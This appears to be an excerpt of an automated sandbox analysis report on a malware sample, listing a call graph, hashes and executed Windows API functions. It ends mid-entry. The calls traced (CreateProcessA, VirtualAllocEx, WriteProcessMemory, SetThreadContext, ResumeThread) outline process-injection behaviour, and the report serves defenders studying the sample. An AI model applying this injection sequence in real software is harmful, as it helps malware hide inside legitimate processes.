34409->34416 34417 5d1d8c3 2 API calls 34409->34417 34418 5d1d7c2 2 API calls 34409->34418 34419 5d1d888 4 API calls 34409->34419 34420 5d1d2eb 2 API calls 34409->34420 34421 5d1cfea 34409->34421 34410->34421 34411->34421 34412->34421 34413->34421 34414->34421 34415->34421 34416->34421 34417->34421 34418->34421 34419->34421 34420->34421 34421->34374 34478 5d1a631 34422->34478 34482 5d1a638 34422->34482 34423 5d1da82 34423->34385 34424 5d1d829 34424->34423 34486 5d1a581 34424->34486 34490 5d1a588 34424->34490 34425 5d1dea5 34494 5d1a7d0 34430->34494 34498 5d1a7c8 34430->34498 34431 5d1dd23 34502 5d1a8c0 34434->34502 34506 5d1a8b8 34434->34506 34435 5d1d5f1 34439 5d1d818 34438->34439 34441 5d1a581 ResumeThread 34439->34441 34442 5d1a588 ResumeThread 34439->34442 34440 5d1dea5 34441->34440 34442->34440 34444 5d1da1e 34443->34444 34446 5d1a581 ResumeThread 34444->34446 34447 5d1a588 ResumeThread 34444->34447 34445 5d1dea5 34445->34445 34446->34445 34447->34445 34450 5d1d32b 34448->34450 34449 5d1d3f7 34449->34385 34450->34449 34510 5d1aa51 34450->34510 34514 5d1aa58 34450->34514 34451 5d1d4f0 34518 5d1a710 34454->34518 34522 5d1a708 34454->34522 34455 5d1d8ad 34456 5d1a7d0 WriteProcessMemory 34455->34456 34457 5d1a7c8 WriteProcessMemory 34455->34457 34456->34455 34457->34455 34462 5d1a7d0 WriteProcessMemory 34460->34462 34463 5d1a7c8 WriteProcessMemory 34460->34463 34461 5d1d7f3 34462->34461 34463->34461 34466 5d1a631 Wow64SetThreadContext 34464->34466 34467 5d1a638 Wow64SetThreadContext 34464->34467 34465 5d1d555 34465->34385 34466->34465 34467->34465 34470 5d1d3d2 34468->34470 34469 5d1d3f7 34469->34385 34470->34469 34472 5d1aa51 CreateProcessA 34470->34472 34473 5d1aa58 CreateProcessA 34470->34473 34471 5d1d4f0 34472->34471 34473->34471 34475 5d1dc6f 34474->34475 34476 5d1a7d0 WriteProcessMemory 34475->34476 34477 5d1a7c8 WriteProcessMemory 34475->34477 34476->34475 34477->34475 34479 5d1a638 Wow64SetThreadContext 34478->34479 34481 5d1a6c5 34479->34481 34481->34424 34483 5d1a67d Wow64SetThreadContext 34482->34483 34485 5d1a6c5 34483->34485 34485->34424 34487 5d1a588 ResumeThread 34486->34487 34489 5d1a5f9 34487->34489 34489->34425 34491 5d1a5c8 ResumeThread 34490->34491 34493 5d1a5f9 34491->34493 34493->34425 34495 5d1a818 WriteProcessMemory 34494->34495 34497 5d1a86f 34495->34497 34497->34431 34499 5d1a7d0 WriteProcessMemory 34498->34499 34501 5d1a86f 34499->34501 34501->34431 34503 5d1a90b ReadProcessMemory 34502->34503 34505 5d1a94f 34503->34505 34505->34435 34507 5d1a8c0 ReadProcessMemory 34506->34507 34509 5d1a94f 34507->34509 34509->34435 34511 5d1aa58 CreateProcessA 34510->34511 34513 5d1aca3 34511->34513 34515 5d1aae1 CreateProcessA 34514->34515 34517 5d1aca3 34515->34517 34519 5d1a750 VirtualAllocEx 34518->34519 34521 5d1a78d 34519->34521 34521->34455 34523 5d1a70d VirtualAllocEx 34522->34523 34525 5d1a78d 34523->34525 34525->34455 34526 4cc42bf 34527 4cc43ac 34526->34527 34528 4cc4302 34526->34528 34530 4cc117c CallWindowProcW 34527->34530 34529 4cc435a CallWindowProcW 34528->34529 34531 4cc4309 34528->34531 34529->34531 34530->34531 34532 4cc77f8 34533 4cc7826 34532->34533 34554 4cc737c 34533->34554 34535 4cc78f3 34536 4cc737c CreateWindowExW 34535->34536 34537 4cc7996 34536->34537 34559 4cc739c 34537->34559 34540 4cc739c CreateWindowExW 34541 4cc7a38 34540->34541 34542 4cc739c CreateWindowExW 34541->34542 34543 4cc7a6a 34542->34543 34544 4cc739c CreateWindowExW 34543->34544 34545 4cc7a9c 34544->34545 34563 4cc73ac 34545->34563 34547 4cc7ace 34548 4cc73ac CreateWindowExW 34547->34548 34549 4cc7b00 34548->34549 34550 4cc739c CreateWindowExW 34549->34550 34551 4cc7c44 34550->34551 34552 4cc739c CreateWindowExW 34551->34552 34553 4cc7c76 34552->34553 34555 4cc7387 34554->34555 34557 2595e6c CreateWindowExW 34555->34557 34568 2598691 34555->34568 34556 4cc9676 34556->34535 34557->34556 34560 4cc73a7 34559->34560 34561 4cc7a06 34560->34561 34572 4ccb71c 34560->34572 34561->34540 34564 4cc73b7 34563->34564 34565 4ccd86b 34564->34565 34566 2595e6c CreateWindowExW 34564->34566 34567 2598691 CreateWindowExW 34564->34567 34565->34547 34566->34565 34567->34565 34570 25986cb 34568->34570 34569 2598991 34569->34556 34570->34569 34571 259d0f8 CreateWindowExW 34570->34571 34571->34569 34573 4ccb727 34572->34573 34575 2595e6c CreateWindowExW 34573->34575 34576 2598691 CreateWindowExW 34573->34576 34574 4ccd5ec 34574->34561 34575->34574 34576->34574 34227 5d1e948 34228 5d1e969 34227->34228 34229 5d1e97c 34227->34229 34230 5d1b958 PostMessageW 34228->34230 34230->34229 34231 259d3c0 34232 259d406 34231->34232 34235 259d5a0 34232->34235 34238 259cf50 34235->34238 34239 259d608 DuplicateHandle 34238->34239 34240 259d4f3 34239->34240 34273 e8d005 34276 e8d123 34273->34276 34282 e8d0f6 34276->34282 34283 4cc117c CallWindowProcW 34276->34283 34291 4cc2c17 34276->34291 34295 4cc1e97 34276->34295 34299 4cc1ea8 34276->34299 34277 e8d023 34279 4cc1ea8 CallWindowProcW 34279->34282 34280 4cc1e97 CallWindowProcW 34280->34282 34281 4cc2c17 CallWindowProcW 34281->34282 34282->34277 34282->34279 34282->34280 34282->34281 34287 4cc117c 34282->34287 34283->34282 34288 4cc1187 34287->34288 34290 4cc2c69 34288->34290 34303 4cc12a4 CallWindowProcW 34288->34303 34293 4cc2c45 34291->34293 34294 4cc2c69 34293->34294 34304 4cc12a4 CallWindowProcW 34293->34304 34296 4cc1ece 34295->34296 34297 4cc117c CallWindowProcW 34296->34297 34298 4cc1eef 34297->34298 34298->34282 34300 4cc1ece 34299->34300 34301 4cc117c CallWindowProcW 34300->34301 34302 4cc1eef 34301->34302 34302->34282 34303->34290 34304->34294

                        Executed Functions

                        Function 05D1DC2D Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 583e3231ffa8714f2a5733945ad9db2fc4949b6b34c47aecfc3ca557654e76ee
                        • Instruction ID: db351e6a84a01d2ee1f9a7c6edb63e8fe202b4b3224ae5427900123030f9e140
                        • Opcode Fuzzy Hash: 583e3231ffa8714f2a5733945ad9db2fc4949b6b34c47aecfc3ca557654e76ee
                        • Instruction Fuzzy Hash: 46A00210D8E104B1B018FD1138444B4C13F421F301F8034035CCA375520610E400411C
                        Function 0259B130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 767 259b130-259b13f 768 259b16b-259b16f 767->768 769 259b141-259b14e call 2598684 767->769 771 259b171-259b17b 768->771 772 259b183-259b1c4 768->772 774 259b150 769->774 775 259b164 769->775 771->772 778 259b1d1-259b1df 772->778 779 259b1c6-259b1ce 772->779 824 259b156 call 259b3c8 774->824 825 259b156 call 259b3c7 774->825 775->768 780 259b1e1-259b1e6 778->780 781 259b203-259b205 778->781 779->778 784 259b1e8-259b1ef call 259aad4 780->784 785 259b1f1 780->785 783 259b208-259b20f 781->783 782 259b15c-259b15e 782->775 786 259b2a0-259b360 782->786 789 259b21c-259b223 783->789 790 259b211-259b219 783->790 787 259b1f3-259b201 784->787 785->787 817 259b368-259b393 GetModuleHandleW 786->817 818 259b362-259b365 786->818 787->783 793 259b230-259b239 call 259aae4 789->793 794 259b225-259b22d 789->794 790->789 798 259b23b-259b243 793->798 799 259b246-259b24b 793->799 794->793 798->799 800 259b269-259b26d 799->800 801 259b24d-259b254 799->801 822 259b270 call 259b6c8 800->822 823 259b270 call 259b6ab 800->823 801->800 803 259b256-259b266 call 259aaf4 call 259ab04 801->803 803->800 805 259b273-259b276 808 259b299-259b29f 805->808 809 259b278-259b296 805->809 809->808 819 259b39c-259b3b0 817->819 820 259b395-259b39b 817->820 818->817 820->819 822->805 823->805 824->782 825->782
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B386
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID: $O$$O
                        • API String ID: 4139908857-2259736977
                        • Opcode ID: 741f438b9bfae33898ad80cc1d0226ae2875c263bf44c664cd93f48e6fcff3a9
                        • Instruction ID: c302df5ef187fa405fb23252ca70baaa2f0f1e8f95e423b1002e15fc7d260200
                        • Opcode Fuzzy Hash: 741f438b9bfae33898ad80cc1d0226ae2875c263bf44c664cd93f48e6fcff3a9
                        • Instruction Fuzzy Hash: BC712470A00B058FEB24DF69E14475ABBF2FF88304F10892DD48AD7A50D775E945CB95
                        Function 05D1AA51 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1347 5d1aa51-5d1aaed 1350 5d1ab26-5d1ab46 1347->1350 1351 5d1aaef-5d1aaf9 1347->1351 1358 5d1ab48-5d1ab52 1350->1358 1359 5d1ab7f-5d1abae 1350->1359 1351->1350 1352 5d1aafb-5d1aafd 1351->1352 1353 5d1ab20-5d1ab23 1352->1353 1354 5d1aaff-5d1ab09 1352->1354 1353->1350 1356 5d1ab0b 1354->1356 1357 5d1ab0d-5d1ab1c 1354->1357 1356->1357 1357->1357 1360 5d1ab1e 1357->1360 1358->1359 1361 5d1ab54-5d1ab56 1358->1361 1365 5d1abb0-5d1abba 1359->1365 1366 5d1abe7-5d1aca1 CreateProcessA 1359->1366 1360->1353 1363 5d1ab79-5d1ab7c 1361->1363 1364 5d1ab58-5d1ab62 1361->1364 1363->1359 1367 5d1ab64 1364->1367 1368 5d1ab66-5d1ab75 1364->1368 1365->1366 1369 5d1abbc-5d1abbe 1365->1369 1379 5d1aca3-5d1aca9 1366->1379 1380 5d1acaa-5d1ad30 1366->1380 1367->1368 1368->1368 1370 5d1ab77 1368->1370 1371 5d1abe1-5d1abe4 1369->1371 1372 5d1abc0-5d1abca 1369->1372 1370->1363 1371->1366 1374 5d1abcc 1372->1374 1375 5d1abce-5d1abdd 1372->1375 1374->1375 1375->1375 1376 5d1abdf 1375->1376 1376->1371 1379->1380 1390 5d1ad40-5d1ad44 1380->1390 1391 5d1ad32-5d1ad36 1380->1391 1393 5d1ad54-5d1ad58 1390->1393 1394 5d1ad46-5d1ad4a 1390->1394 1391->1390 1392 5d1ad38 1391->1392 1392->1390 1395 5d1ad68-5d1ad6c 1393->1395 1396 5d1ad5a-5d1ad5e 1393->1396 1394->1393 1397 5d1ad4c 1394->1397 1399 5d1ad7e-5d1ad85 1395->1399 1400 5d1ad6e-5d1ad74 1395->1400 1396->1395 1398 5d1ad60 1396->1398 1397->1393 1398->1395 1401 5d1ad87-5d1ad96 1399->1401 1402 5d1ad9c 1399->1402 1400->1399 1401->1402 1404 5d1ad9d 1402->1404 1404->1404
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D1AC8E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 9e5ad7f985cdd2e9efccf5e9ef5bfed52197cfbc08eb630b64b7ad92b06776c3
                        • Instruction ID: cc12f7bc1d261519268e7627a6d97f39cb4047a1fe530f57c1b046811a8b8701
                        • Opcode Fuzzy Hash: 9e5ad7f985cdd2e9efccf5e9ef5bfed52197cfbc08eb630b64b7ad92b06776c3
                        • Instruction Fuzzy Hash: 36919B71D01619AFDF20CFA8D940BEDBBB2FF48315F04816AD809A7240DB749985CF96
                        Function 05D1AA58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1405 5d1aa58-5d1aaed 1407 5d1ab26-5d1ab46 1405->1407 1408 5d1aaef-5d1aaf9 1405->1408 1415 5d1ab48-5d1ab52 1407->1415 1416 5d1ab7f-5d1abae 1407->1416 1408->1407 1409 5d1aafb-5d1aafd 1408->1409 1410 5d1ab20-5d1ab23 1409->1410 1411 5d1aaff-5d1ab09 1409->1411 1410->1407 1413 5d1ab0b 1411->1413 1414 5d1ab0d-5d1ab1c 1411->1414 1413->1414 1414->1414 1417 5d1ab1e 1414->1417 1415->1416 1418 5d1ab54-5d1ab56 1415->1418 1422 5d1abb0-5d1abba 1416->1422 1423 5d1abe7-5d1aca1 CreateProcessA 1416->1423 1417->1410 1420 5d1ab79-5d1ab7c 1418->1420 1421 5d1ab58-5d1ab62 1418->1421 1420->1416 1424 5d1ab64 1421->1424 1425 5d1ab66-5d1ab75 1421->1425 1422->1423 1426 5d1abbc-5d1abbe 1422->1426 1436 5d1aca3-5d1aca9 1423->1436 1437 5d1acaa-5d1ad30 1423->1437 1424->1425 1425->1425 1427 5d1ab77 1425->1427 1428 5d1abe1-5d1abe4 1426->1428 1429 5d1abc0-5d1abca 1426->1429 1427->1420 1428->1423 1431 5d1abcc 1429->1431 1432 5d1abce-5d1abdd 1429->1432 1431->1432 1432->1432 1433 5d1abdf 1432->1433 1433->1428 1436->1437 1447 5d1ad40-5d1ad44 1437->1447 1448 5d1ad32-5d1ad36 1437->1448 1450 5d1ad54-5d1ad58 1447->1450 1451 5d1ad46-5d1ad4a 1447->1451 1448->1447 1449 5d1ad38 1448->1449 1449->1447 1452 5d1ad68-5d1ad6c 1450->1452 1453 5d1ad5a-5d1ad5e 1450->1453 1451->1450 1454 5d1ad4c 1451->1454 1456 5d1ad7e-5d1ad85 1452->1456 1457 5d1ad6e-5d1ad74 1452->1457 1453->1452 1455 5d1ad60 1453->1455 1454->1450 1455->1452 1458 5d1ad87-5d1ad96 1456->1458 1459 5d1ad9c 1456->1459 1457->1456 1458->1459 1461 5d1ad9d 1459->1461 1461->1461
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D1AC8E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: af8e38830df72802a72180c5a8f98fc394e1a936cc24ebbb0736b3fcf19b35d2
                        • Instruction ID: bb95b1365a6bf872bf36a03e44e512d10e5a109a31bf97051b53ae6df34d877f
                        • Opcode Fuzzy Hash: af8e38830df72802a72180c5a8f98fc394e1a936cc24ebbb0736b3fcf19b35d2
                        • Instruction Fuzzy Hash: 02919C71D01619AFDF20CFA8D940BEDBBB2FF44311F04816AD809A7240DB749985CF96
                        Function 04CC1150 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CC1E02
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2196016570.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_4cc0000_ECcZgk.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: c1412ea9e1dc07e3b37d7e0dfff9f218e4355a63f3e5984f96495334b9d6b47c
                        • Instruction ID: 8447c25c91dc930ea1e801ed0826660beea1bdfa0a1aea464333c092ef6622e9
                        • Opcode Fuzzy Hash: c1412ea9e1dc07e3b37d7e0dfff9f218e4355a63f3e5984f96495334b9d6b47c
                        • Instruction Fuzzy Hash: 1751B2B1D00309DFDB14CF9AC984ADEBBB6BF48310F24812EE419AB211DB75A945CF90
                        Function 04CC1CE4 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CC1E02
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2196016570.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_4cc0000_ECcZgk.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 2b12660824581107be5774dd118d8a6dd0e2f06c17075fa6828efa7967d7d4c9
                        • Instruction ID: f0af986e3ecaa2b53159d0fda098972ad9adfaed1595504335826a7299c74a36
                        • Opcode Fuzzy Hash: 2b12660824581107be5774dd118d8a6dd0e2f06c17075fa6828efa7967d7d4c9
                        • Instruction Fuzzy Hash: 8B51D1B1D10309DFDB14CF9AC484ADEBBB2BF48310F24812EE418AB211DB74A945CF90
                        Function 04CC12A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04CC4381
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2196016570.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_4cc0000_ECcZgk.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: e3e438147f06d499c65f60c3377e6d4aa8715ce1630e8043471de4915520defb
                        • Instruction ID: d24943769686f34ef6b0ce40f980f406ee04a3a483acc5fa96270627f1d9ee74
                        • Opcode Fuzzy Hash: e3e438147f06d499c65f60c3377e6d4aa8715ce1630e8043471de4915520defb
                        • Instruction Fuzzy Hash: C44126B4A003059FDB14CF99C448AAABBF6FB88314F29C45DE519AB321D374A941CBA4
                        Function 025944E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 025959C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 08111f6144ac849a34bce879082c1aebc43e6f6701b5cc8cee159e5f4d21d5cf
                        • Instruction ID: 6dc7d76f8c0be8f5209a9685262bb59fcdc6bf87e6b4208e243f58eea09efed7
                        • Opcode Fuzzy Hash: 08111f6144ac849a34bce879082c1aebc43e6f6701b5cc8cee159e5f4d21d5cf
                        • Instruction Fuzzy Hash: A641F1B0D0061DCBDB25CFA9C984BDDBBF6BF48304F60806AD409AB251DB716949CF95
                        Function 02595917 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 025959C9
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b8f4b465de8a8e825477c32e087b5e3f15ea27035738dea5e2774a05bce2ee91
                        • Instruction ID: 7c2cb321b61136f840c9cd453fa3f41f9a98b16afa28d7f34ffc9988be854dc8
                        • Opcode Fuzzy Hash: b8f4b465de8a8e825477c32e087b5e3f15ea27035738dea5e2774a05bce2ee91
                        • Instruction Fuzzy Hash: B941E0B0D00619CBDB25CFA9C884BCDBBB6BF49304F60806AD408AB251DB71694ACF95
                        Function 05D1A7C8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                        Download Yara Rule
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05D1A860
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: f2868cf4890bfdadbd89eb186a8eee577386172b5bb4253990da903ad7de3010
                        • Instruction ID: f0bfad7b478f7f9e89dc51b77b3707d0276f5127d81810af47be529fdb1a786f
                        • Opcode Fuzzy Hash: f2868cf4890bfdadbd89eb186a8eee577386172b5bb4253990da903ad7de3010
                        • Instruction Fuzzy Hash: 392148B5D003099FCB10CFA9D845BEEBBF5FF48310F10842AE919A7240D7749941CBA5
                        Function 05D1A7D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05D1A860
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: cc032fc98bd5ea0b03db66430d6dd5756301dad5877491153db1a018b3b1a3c2
                        • Instruction ID: ccb441dfc4910d4a475b07a89ede765f481ed634efea0b817a7782a706b0a982
                        • Opcode Fuzzy Hash: cc032fc98bd5ea0b03db66430d6dd5756301dad5877491153db1a018b3b1a3c2
                        • Instruction Fuzzy Hash: 382139B5D003099FCB10DFA9D885BEEBBF5FF48310F10842AE919A7240D7789945DBA5
                        Function 05D1A631 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D1A6B6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 78803cb3532ca2673d51ed220972bd5bfe5b3b3fd56136a89f276d727731c698
                        • Instruction ID: 7ef51324aecab2e852aad447cd20e944b0479349606f50669edd3ab8fe701c58
                        • Opcode Fuzzy Hash: 78803cb3532ca2673d51ed220972bd5bfe5b3b3fd56136a89f276d727731c698
                        • Instruction Fuzzy Hash: 852145B1D002099FCB10DFAAC4857EEBBF4EB88324F10842AD419A7240CB789945CBA5
                        Function 05D1A8B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D1A940
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 7db78616116b96ce6b9acbea911d38c1531aa6e5066ecadab55da32108ab796d
                        • Instruction ID: 4b818f94d2339705079880b6be14134a80605dd81995af722f248cf1845a02b2
                        • Opcode Fuzzy Hash: 7db78616116b96ce6b9acbea911d38c1531aa6e5066ecadab55da32108ab796d
                        • Instruction Fuzzy Hash: 612159B1C003099FCB10DFAAD841AEEFBF5FF48320F50842AE919A3241C7389941DBA5
                        Function 0259CF50 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0259D5CE,?,?,?,?,?), ref: 0259D68F
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 24fc7a64180ee7ab207228147147fe74f5a6f71f81a8609ae0ba186f36ba364a
                        • Instruction ID: d6fa9bec98d9d7d0fc2c8c5949a55956054ecff90c2a737c45e3e8c1a9c39003
                        • Opcode Fuzzy Hash: 24fc7a64180ee7ab207228147147fe74f5a6f71f81a8609ae0ba186f36ba364a
                        • Instruction Fuzzy Hash: 4E2105B5D012099FDB10DF9AD584ADEBBF4FB48310F10841AE918A3310D378A950CFA5
                        Function 05D1A638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D1A6B6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: b6e36c7bbc6d7b83d3fdb87d6555e503e9510689090b226260ce70427043cb44
                        • Instruction ID: e9d9bbf2d8ebe7aa5af7a96b91713cd53b301688f8ceea7ca30e47354faba877
                        • Opcode Fuzzy Hash: b6e36c7bbc6d7b83d3fdb87d6555e503e9510689090b226260ce70427043cb44
                        • Instruction Fuzzy Hash: 9D2138B1D003099FDB10DFAAC4857EEBBF4EF88324F10842AD419A7240C7789945CFA5
                        Function 05D1A8C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D1A940
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 139e872523ebcad53fb616a26e58b62bfc10be769ba5b345388624b62d6aeb67
                        • Instruction ID: 74c3947aa57ac34771873d84138f0a808cd72bbbf50a0a773924214305859991
                        • Opcode Fuzzy Hash: 139e872523ebcad53fb616a26e58b62bfc10be769ba5b345388624b62d6aeb67
                        • Instruction Fuzzy Hash: F8213AB1C003499FCB10DFAAD845AEEFBF5FF48320F50842AE959A7240C7349941DBA5
                        Function 0259AB30 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B401,00000800,00000000,00000000), ref: 0259B612
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e4f991459154710fee07ca09622132294842896fe7b9a5a1323cafbca881d8a3
                        • Instruction ID: 2e2e928b93eddab64a2fd6ffcee7e5d8684ba5751a8ac2ccd665fafa18d08433
                        • Opcode Fuzzy Hash: e4f991459154710fee07ca09622132294842896fe7b9a5a1323cafbca881d8a3
                        • Instruction Fuzzy Hash: 461100B6D003499FEB10CF9AD544AEEFBF4EB88314F14842AE919A7200D375A945CFA5
                        Function 05D1A708 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D1A77E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: a7e99f263a7874c2441a4ec54849cd84af7056f985d026b3bcca5d5472c07d69
